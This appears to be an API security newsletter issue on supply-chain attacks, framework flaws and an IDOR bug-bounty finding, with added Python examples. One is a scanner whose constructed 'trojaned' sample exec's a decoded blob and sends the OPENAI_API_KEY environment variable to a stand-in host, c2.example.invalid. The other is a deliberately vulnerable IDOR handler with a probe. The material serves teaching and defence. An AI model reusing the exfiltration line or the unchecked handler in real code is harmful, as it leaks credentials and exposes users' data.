Issue 260: Attacking the API SDLC, lessons from an API bounty hunter, Node APIs done right and news of recent vulnerabilities


This week, we focus on raising awareness about API vulnerabilities created by direct attacks against API development teams and tech stacks. We also share articles on safe use of API frameworks, and examine how OWASP API vulnerabilities are uncovered by bounty hunters.

Article: How secure is your API SDLC?

API teams can produce secure and reliable APIs through rigorous design, coding and testing. However, this recent article highlights how every phase of API development is now at risk, forcing API teams to take a broader view of API security beyond just the code they produce.

Some common sources of SDLC vulnerabilities mentioned include:

  • granting excessive access rights to outsourced development teams
  • poorly configured CI/CD pipelines
  • OAuth phishing
  • mismanaged development teams with lax security practices

This means that API security requires a broader perspective and must encompass not only core secure development practices, but also rigorous cybersecurity awareness across the API team and organization. 

Vulnerability: Malicious code injected into the Solana JavaScript SDK

The Solana JavaScript SDK, a widely used package on NPM with over 350,000 weekly downloads, enables developers to interact with the Solana blockchain via API requests.

A hacker reportedly injected malicious code into the SDK, turning it into a tool for stealing private keys in a classic supply-chain attack. The compromised code allowed the hacker to extract private keys from any application that pulled in the infected version of the SDK and send them to an API endpoint under the hacker’s control. Possession of a user’s private keys allows a hacker to drain their digital wallets.

The report suggests that the attacker may have compromised the SDK’s developers through social engineering or phishing tactics, to gain unauthorized access to the package. If true, it demonstrates why API security training should extend from secure coding practices to include general practices for good cyber hygiene. On the consuming side, pinning dependency versions through a lockfile and reviewing lockfile changes before they are merged narrows the window in which a poisoned release can reach production builds.

Vulnerability: Laravel security flaws expose API developers 

Staying on the topic of SDLC vulnerabilities, a recently discovered critical vulnerability could compromise the security of APIs developed with the Laravel framework. 

Laravel is a popular web application framework and is also used for API backend development. 

The bug lay in the request handling stage: malicious user input passed in a request as URL query strings could be used to gain unauthorized access.

This is a reminder that the frameworks that API developers choose to use in their projects can inadvertently introduce security vulnerabilities into APIs and applications. It highlights the importance of carefully choosing and configuring frameworks and libraries, many of which are not secure by default, and the need for extensive API security testing to identify issues early on.

Teams are also advised to monitor advisory updates for all dependencies used in API development for prompt notification of new security issues and critical updates.

Vulnerability: Python AI packages disguise malicious API 

From PHP to Python, another gotcha for API developers to watch out for is the use of malicious third-party packages. 

A report on the Dark Reading website describes how developers, keen to jump on the AI bandwagon, can be duped into installing malicious packages with hidden malware. 

In this incident developers were offered a quick and free way to add AI functionality into their projects by installing a Python package. The package claimed to provide API access to GenAI platforms, but behind the scenes it also injected the developer’s project with malware. Notably, the package appeared to function as expected, making it easier for developers to miss the danger during testing.

“They committed the extra effort to make it look legitimate”

Leveraging open-source software can significantly reduce development time and effort, but it also comes with inherent risks when the security of the code is essentially unknown. To mitigate these risks, development teams should adopt a zero-trust approach to open-source dependencies. This involves thoroughly reviewing, auditing, and testing any package before integration to ensure it meets security standards, with particular attention to what a package does at install time and at import time, since that is where a backdoor can run without any of its advertised functions ever being called.
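As an added illustration of that install-time and import-time review (example code written for this issue, not taken from the Dark Reading report or from any real package), the script below parses a package module with Python’s ast module and separates the calls that execute on import from those that only run when the application calls a function. The two sample modules are constructed for the example: the second is the first plus a module-scope payload, mimicking the report’s observation that the advertised client still works.

```python
"""Pre-install triage for a Python dependency: which risky calls run at import time?

Added example, not from any real package. The sample modules below are constructed.
"""
import ast
from dataclasses import dataclass

# Calls that deserve a second look in a package claiming to be a thin GenAI client.
RUNS_CODE = {"exec", "eval", "compile", "__import__", "marshal.loads"}
DECODES = {"base64.b64decode", "zlib.decompress"}
NETWORK = {"urllib.request.urlopen", "socket.socket"}
SHELL = {"subprocess.Popen", "subprocess.run", "os.system"}
SUSPICIOUS_CALLS = RUNS_CODE | DECODES | NETWORK | SHELL


@dataclass(frozen=True)
class Finding:
    filename: str
    lineno: int
    what: str        # e.g. "call exec", "env read os.environ.get"
    top_level: bool  # True when it executes on import (or when setup.py runs)


def _dotted(node):
    """Flatten a Name/Attribute chain such as urllib.request.urlopen to a string."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def triage_source(filename, source):
    """Return Findings for one module, tagging each with whether it runs at import time."""
    findings = []

    def note(node, what, in_func):
        findings.append(Finding(filename, node.lineno, what, not in_func))

    def visit(node, in_func):
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            # Decorators and argument defaults evaluate at definition time; the body does not.
            for d in node.decorator_list:
                visit(d, in_func)
            for d in node.args.defaults + [k for k in node.args.kw_defaults if k]:
                visit(d, in_func)
            for child in node.body:
                visit(child, True)
            return
        if isinstance(node, ast.Lambda):
            visit(node.body, True)
            return
        if isinstance(node, ast.Call):
            name = _dotted(node.func)
            if name in SUSPICIOUS_CALLS:
                note(node, f"call {name}", in_func)
            elif name == "os.getenv" or (name or "").startswith("os.environ"):
                note(node, f"env read {name}", in_func)
        elif isinstance(node, ast.Subscript) and _dotted(node.value) == "os.environ":
            note(node, "env read os.environ", in_func)
        for child in ast.iter_child_nodes(node):
            visit(child, in_func)

    visit(ast.parse(source, filename=filename), False)
    return findings


def is_suspicious(findings):
    """Flag for manual review if, at import time, the module executes generated code,
    or reads the environment and talks to the network, or decodes a blob and talks
    to the network. Function-scoped findings are reported but do not trip the rule."""
    top = [f.what for f in findings if f.top_level]
    calls = {w.split(" ", 1)[1] for w in top if w.startswith("call ")}
    reads_env = any(w.startswith("env read") for w in top)
    phones_home = bool(calls & NETWORK)
    return bool(calls & RUNS_CODE) or (reads_env and phones_home) or (bool(calls & DECODES) and phones_home)


# Constructed sample module: a plausible minimal client for a (fictional) GenAI API.
BENIGN_CLIENT = '''
import json
import urllib.request

API_URL = "https://genai.example.invalid/v1/generate"

def generate(prompt, api_key):
    req = urllib.request.Request(API_URL, data=json.dumps({"prompt": prompt}).encode(),
                                 headers={"Authorization": "Bearer " + api_key})
    return urllib.request.urlopen(req).read()
'''

# Same client plus an import-time payload; generate() still works, so functional tests pass.
TROJANED_CLIENT = BENIGN_CLIENT + '''
import base64, os
_blob = base64.b64decode("cGFzcw==")   # decodes to "pass" in this example
exec(_blob)
urllib.request.urlopen("https://c2.example.invalid/collect",
                       data=os.environ.get("OPENAI_API_KEY", "").encode())
'''

if __name__ == "__main__":
    for label, src in (("benign", BENIGN_CLIENT), ("trojaned", TROJANED_CLIENT)):
        found = triage_source("client.py", src)
        print(label, "suspicious" if is_suspicious(found) else "clean", [f.what for f in found if f.top_level])
```

The decision rule is deliberately narrow: a network call inside a function is what an API client is for, so it is reported but not flagged, while the same call at module scope next to an environment read is exactly the pattern that turns a client library into a credential stealer. Treat a hit as a prompt for the manual review the article calls for, not as a verdict.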

Article: Node APIs done right

Moving from vulnerabilities to best practices, the “9 Principles for Doing Node.js Right in Enterprise Environments” guide shares essential tips and recommendations for building secure and reliable APIs on the popular Node.js runtime.

It includes recommendations from industry experts to focus on defensive testing, including negative testing and security testing. It also devotes a section to error handling, a common source of API vulnerabilities and a major topic of the previous issue of this newsletter.

The guide also describes the benefits of using API specifications in a multi-team environment. 

“By defining your API’s structure, data types, and operations, you can ensure that different teams can work independently while maintaining compatibility and avoiding misunderstandings”.

Similarly, API specifications help to clearly define and share the security requirements of an API, a practice we have been advocating for a long time in this newsletter.  

This guide contains a lot of very useful information. Recommended reading!

Vulnerability: How a bug bounty hunt reveals API IDOR flaws

The methods used by penetration testers and hackers can provide valuable insights to an API team on how to eliminate the risk from common API attacks.

This report from a bug bounty hunter shows how an attacker can probe and test your API for an exploitable vulnerability. In this case, the bounty hunter focused on manipulating the API user input to attempt to invoke unexpected behavior or response from the target API, a common tactic used by hackers. 

By changing a user_id parameter in the API request, the bounty hunter discovered that the API would return a resource that did not belong to the authenticated user. This revealed that the API had a well-known authorization vulnerability called Insecure Direct Object Reference (IDOR): the server authenticated the caller but never checked that the caller was entitled to the specific object requested.

The relative simplicity of the test to uncover this severe API authorization flaw demonstrates why IDOR, also known as Broken Object Level Authorization (BOLA), is the top risk in the 2023 OWASP API Security Top 10 list. 

Steps to prevent successful BOLA attacks against your APIs are shared here.
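To make the flaw and its fix concrete, here is an added example (written for this issue, not code from the bounty report or from the target API) of a GET /users/{user_id}/orders handler in the vulnerable form beside the hardened form, together with the bounty hunter’s probe: authenticate as one user, request another user’s user_id, and see what comes back. The data, the Principal type and the handler signatures are constructed for the example; no web framework is involved so it runs offline.

```python
"""IDOR / BOLA on a user_id path parameter: vulnerable handler, hardened handler, probe.

Added example with constructed data; not the code of any real API.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Order:
    order_id: int
    owner_id: int
    item: str


@dataclass(frozen=True)
class Principal:
    """Who the server has already authenticated (from the session or token)."""
    user_id: int


@dataclass(frozen=True)
class Response:
    status: int
    body: object


# Constructed sample data: user 1 owns order 100, user 2 owns order 200.
ORDERS = [Order(100, 1, "hardware token"), Order(200, 2, "smart card reader")]


def list_orders_vulnerable(caller: Principal, user_id: int) -> Response:
    """GET /users/{user_id}/orders with the bug from the report: the caller is
    authenticated, but the client-supplied path parameter alone drives the lookup."""
    orders = [o for o in ORDERS if o.owner_id == user_id]
    return Response(200, [o.order_id for o in orders])


def list_orders_hardened(caller: Principal, user_id: int) -> Response:
    """Same route with object-level authorization: the path parameter must match the
    authenticated principal, and the query itself is scoped to the caller, so even a
    later refactor of the check cannot widen the result set."""
    if user_id != caller.user_id:
        # 403 here; some teams return 404 so the response does not confirm the id exists.
        return Response(403, {"error": "forbidden"})
    orders = [o for o in ORDERS if o.owner_id == caller.user_id]
    return Response(200, [o.order_id for o in orders])


def idor_probe(handler, attacker: Principal, victim_user_id: int):
    """The bounty hunter's test: call the endpoint as `attacker` with someone else's
    user_id. Returns the order ids that came back but do not belong to the attacker
    (the oracle uses the fixture; a real tester compares against a second account)."""
    response = handler(attacker, victim_user_id)
    if response.status != 200:
        return []
    mine = {o.order_id for o in ORDERS if o.owner_id == attacker.user_id}
    return [oid for oid in response.body if oid not in mine]


if __name__ == "__main__":
    attacker = Principal(user_id=1)
    for name, handler in (("vulnerable", list_orders_vulnerable), ("hardened", list_orders_hardened)):
        print(name, "leaked:", idor_probe(handler, attacker, victim_user_id=2))
```

The probe is nothing more than a negative test, and that is the point: it belongs in the API’s own test suite, run against every route that takes an object identifier, so the team finds the missing check before a bounty hunter does. Where a route only ever serves the caller’s own data, dropping the user_id parameter altogether (GET /me/orders) removes the object reference that made the probe possible.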
